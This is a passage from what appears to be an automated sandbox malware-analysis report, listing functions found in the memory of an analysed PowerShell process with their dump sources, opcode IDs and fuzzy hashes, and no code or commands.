                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_4b90000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a3c4760f8afbc136ca23dafe4c6801c2310b501364aa3ad800742b274a1a73e4
                                                                                                                                                                                                  • Instruction ID: 1c461bf0dc5a6d8b325655f04c3ce021ab5b442d920e6c0c6fb6b8bd0ddf35d0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3c4760f8afbc136ca23dafe4c6801c2310b501364aa3ad800742b274a1a73e4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0211AB4A042199FCB04CF68D8809AEBBF5FF89300B1585A6E815EB356D635ED41CBA1
                                                                                                                                                                                                  Function 04B93002 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1955978972.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_4b90000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 53f46c0ce212b9c1395acb043eb25be4fb9965dec4af7d4e4a918743827a23fa
                                                                                                                                                                                                  • Instruction ID: 74f3a4ff6fab1cd0c3face2c6514f4724486aeb4a2d1f8b9e21a3fb9fe0473b6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53f46c0ce212b9c1395acb043eb25be4fb9965dec4af7d4e4a918743827a23fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59211A74A042459FCB05CFACC4949AABBF1FF8D314B1585A9E845AB352C331EC45CBA0
                                                                                                                                                                                                  Function 02F0D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1955742322.0000000002F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F0D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2f0d000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0e50c2ddec5e310f58d086bcc1108f4604c8eea0e4675d700e162164e95f2fa0
                                                                                                                                                                                                  • Instruction ID: 9728f742403c022e08203bae7a892362d35cb49b04ed6b8ba4d71eb07e970d0a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e50c2ddec5e310f58d086bcc1108f4604c8eea0e4675d700e162164e95f2fa0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A01A7719093409AE7104A65C9C4F67BF98DF417A4F18C529EE4C4B1CAC7799841DAB1
                                                                                                                                                                                                  Function 02F0D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1955742322.0000000002F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F0D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2f0d000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 07a594615f3c8093fc911f0f58ee0116e958234901b6043c8b768f6e730d150c
                                                                                                                                                                                                  • Instruction ID: f31691c3a749e734ad38ee9ad567b88d7c693ce4e28ee430d5ba20ef06acb1b6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07a594615f3c8093fc911f0f58ee0116e958234901b6043c8b768f6e730d150c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0014C7140E3C09ED7128B258894B52BFB4EF43664F1DC0DBD9888F1E7C2699849DB72
                                                                                                                                                                                                  Function 04B9429E Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1955978972.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_4b90000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1dba41fc0b89c65489ad489518b62256109cf05b97ac5bcfdc575fe4e22e2f1d
                                                                                                                                                                                                  • Instruction ID: e36963e0913cb0983022ca4bd91965f1645fb7f465cced7f3f2980a9ee53666c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dba41fc0b89c65489ad489518b62256109cf05b97ac5bcfdc575fe4e22e2f1d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FF0DA35A001059FCB15CF9CD990AEEF7B1FF88324F208199E515A72A1C736AC52CF50

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 075B0148 Relevance: 10.3, Strings: 8, Instructions: 252COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1957836242.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_75b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$#k$$^q$$^q$$^q
                                                                                                                                                                                                  • API String ID: 0-2613667054
                                                                                                                                                                                                  • Opcode ID: 26b45af6644a166fa8eb73f90175d9fb9605849b0412ee32da5177916e4cd57c
                                                                                                                                                                                                  • Instruction ID: 24955f89f3f3b235311e350ea872e736fec70b721f00c72faecbd646469187cb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26b45af6644a166fa8eb73f90175d9fb9605849b0412ee32da5177916e4cd57c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D8104B1B043198FDB344B69D8056FBBBE2BFC5610F14846BD849DB3A1DA32D849C7A1
                                                                                                                                                                                                  Function 075B0860 Relevance: 6.4, Strings: 5, Instructions: 112COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1957836242.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_75b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                  • API String ID: 0-578306960
                                                                                                                                                                                                  • Opcode ID: 315296a6cf103012d959ad40a6e003e6922a3a4a191096d3ad19640e3713f237
                                                                                                                                                                                                  • Instruction ID: d8f7be9b2756e99a5a03769c36bd6833df898c0142a1c63771b42df65011664e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 315296a6cf103012d959ad40a6e003e6922a3a4a191096d3ad19640e3713f237
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5231B0727042158FE7289A699804AFBBBE5FFC5620F24846BE549CF3A1CA32DD45C790
                                                                                                                                                                                                  Function 075B2428 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1957836242.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_75b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                  • API String ID: 0-2125118731
                                                                                                                                                                                                  • Opcode ID: 2c1bfef4fbec2510d8af4447cc1085f31d1ee414869fb617748129efd9291f60
                                                                                                                                                                                                  • Instruction ID: 8c4fc515de6197488166b3c516e154cc5354eac704467ffad68b2fdb93596089
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c1bfef4fbec2510d8af4447cc1085f31d1ee414869fb617748129efd9291f60
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 722107B1B103069BDB3855299C40BF7BAD6BBC4715F24882BE509DF785DE35D8418272